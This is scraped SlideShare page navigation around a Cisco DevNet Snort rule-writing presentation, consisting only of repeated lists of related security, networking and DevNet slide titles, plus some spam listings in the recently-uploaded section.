Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Fortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationFortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationNCS Computech Ltd.
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphVaticle
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Jason Williams
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAPPhannarith Ou, G-CISO
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Snort IDS/IPS Basics
Snort IDS/IPS BasicsSnort IDS/IPS Basics
Snort IDS/IPS BasicsMahendra Pratap Singh
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-TutorialVladimir Koychev
 

Weitere Àhnliche Inhalte

Was ist angesagt?

Suricata
SuricataSuricata
Suricatatex_morgan
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber Security
 
Firewall fundamentals
Firewall fundamentalsFirewall fundamentals
Firewall fundamentalsThang Man
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Fortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationFortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationNCS Computech Ltd.
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphVaticle
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Jason Williams
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 

Was ist angesagt? (20)

Suricata
SuricataSuricata
Suricata
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Firewall fundamentals
Firewall fundamentalsFirewall fundamentals
Firewall fundamentals
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
Fortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationFortinet FortiOS 5 Presentation
Fortinet FortiOS 5 Presentation
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge Graph
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
 
Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)Suricata: A Decade Under the Influence (of packet sniffing)
Suricata: A Decade Under the Influence (of packet sniffing)
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 

Andere mochten auch

Starting the DevOps Train
Starting the DevOps TrainStarting the DevOps Train
Starting the DevOps TrainCisco DevNet
 
DEVNET-1166 Open SDN Controller APIs
DEVNET-1166 Open SDN Controller APIsDEVNET-1166 Open SDN Controller APIs
DEVNET-1166 Open SDN Controller APIsCisco DevNet
 
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...Cisco DevNet
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system pptSheetal Verma
 
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...ijsrd.com
 
ImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźDiego Senziani
 
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1Joshua S. White, PhD josh@securemind.org
 
Sms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsSms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsTextGuard
 
Regular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionRegular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionDimuthu Samarasekara
 
Pcre introduciton
Pcre introducitonPcre introduciton
Pcre introducitonYi-Jun Zheng
 
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...amiable_indian
 
All About Snort
All About SnortAll About Snort
All About Snort28pranjal
 
Industrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortIndustrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortDisha Bedi
 

Andere mochten auch (20)

Snort IDS/IPS Basics
Snort IDS/IPS BasicsSnort IDS/IPS Basics
Snort IDS/IPS Basics
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-Tutorial
 
Snort IPS
Snort IPSSnort IPS
Snort IPS
 
Starting the DevOps Train
Starting the DevOps TrainStarting the DevOps Train
Starting the DevOps Train
 
DEVNET-1166 Open SDN Controller APIs
DEVNET-1166 Open SDN Controller APIsDEVNET-1166 Open SDN Controller APIs
DEVNET-1166 Open SDN Controller APIs
 
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system ppt
 
Snort manual
Snort manualSnort manual
Snort manual
 
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
 
ImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂź
 
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
 
Sms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsSms compliance white paper for mobile communications
Sms compliance white paper for mobile communications
 
Regular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionRegular Expression Mining System for Information Extraction
Regular Expression Mining System for Information Extraction
 
Malicious traffic
Malicious trafficMalicious traffic
Malicious traffic
 
Pcre introduciton
Pcre introducitonPcre introduciton
Pcre introduciton
 
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
 
All About Snort
All About SnortAll About Snort
All About Snort
 
Snort IDS
Snort IDSSnort IDS
Snort IDS
 
Industrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortIndustrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using Snort
 
Snort
SnortSnort
Snort
 

Ähnlich wie Introduction to Snort Rule Writing

Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Codemotion
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologiesAtul Tiwari
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istioLin Sun
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with IstioAll Things Open
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioLin Sun
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Design Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyDesign Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyManageIQ
 
Student Name _________________________________ Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docxStudent Name _________________________________ Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docxemelyvalg9
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
apache-refcard-a4.pdf
apache-refcard-a4.pdfapache-refcard-a4.pdf
apache-refcard-a4.pdfGiovaRossi
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Secure Programming
Secure ProgrammingSecure Programming
Secure Programmingalpha0
 
03 sockets
03 sockets03 sockets
03 socketsPavan Illa
 

Ähnlich wie Introduction to Snort Rule Writing (20)

Web application security
Web application securityWeb application security
Web application security
 
CGI.ppt
CGI.pptCGI.ppt
CGI.ppt
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
 
FFmpeg
FFmpegFFmpeg
FFmpeg
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologies
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istio
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with Istio
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istio
 
Dynamic Web Programming
Dynamic Web ProgrammingDynamic Web Programming
Dynamic Web Programming
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Design Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyDesign Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John Hardy
 
Student Name _________________________________ Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docxStudent Name _________________________________ Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docx
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
apache-refcard-a4.pdf
apache-refcard-a4.pdfapache-refcard-a4.pdf
apache-refcard-a4.pdf
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Secure Programming
Secure ProgrammingSecure Programming
Secure Programming
 
03 sockets
03 sockets03 sockets
03 sockets
 

Mehr von Cisco DevNet

How to Contribute to Ansible
How to Contribute to AnsibleHow to Contribute to Ansible
How to Contribute to AnsibleCisco DevNet
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsCisco DevNet
 
How to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsHow to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsCisco DevNet
 
Cisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco DevNet
 
Device Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionDevice Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionCisco DevNet
 
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APIBuilding a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APICisco DevNet
 
Application Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowApplication Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowCisco DevNet
 
WAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveWAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveCisco DevNet
 
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco DevNet
 
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Cisco DevNet
 
NETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesNETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesCisco DevNet
 
UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveCisco DevNet
 
OpenStack Enabling DevOps
OpenStack Enabling DevOpsOpenStack Enabling DevOps
OpenStack Enabling DevOpsCisco DevNet
 
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...Cisco DevNet
 
Getting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsGetting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsCisco DevNet
 
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco DevNet
 
Coding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCoding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCisco DevNet
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco DevNet
 
DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016Cisco DevNet
 
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016Cisco DevNet
 

Mehr von Cisco DevNet (20)

How to Contribute to Ansible
How to Contribute to AnsibleHow to Contribute to Ansible
How to Contribute to Ansible
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat bots
 
How to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsHow to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and Chatbots
 
Cisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable Web
 
Device Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionDevice Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play Solution
 
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APIBuilding a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
 
Application Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowApplication Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible Netflow
 
WAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveWAN Automation Engine API Deep Dive
WAN Automation Engine API Deep Dive
 
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open Discussion
 
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
 
NETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesNETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network Devices
 
UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep Dive
 
OpenStack Enabling DevOps
OpenStack Enabling DevOpsOpenStack Enabling DevOps
OpenStack Enabling DevOps
 
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
 
Getting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsGetting Started: Developing Tropo Applications
Getting Started: Developing Tropo Applications
 
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API Workshop
 
Coding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCoding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using Spark
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
 
DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016
 
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
 

KĂŒrzlich hochgeladen

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...gurkirankumar98700
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Presentation on how to chat with PDF using ChatGPT code interpreter
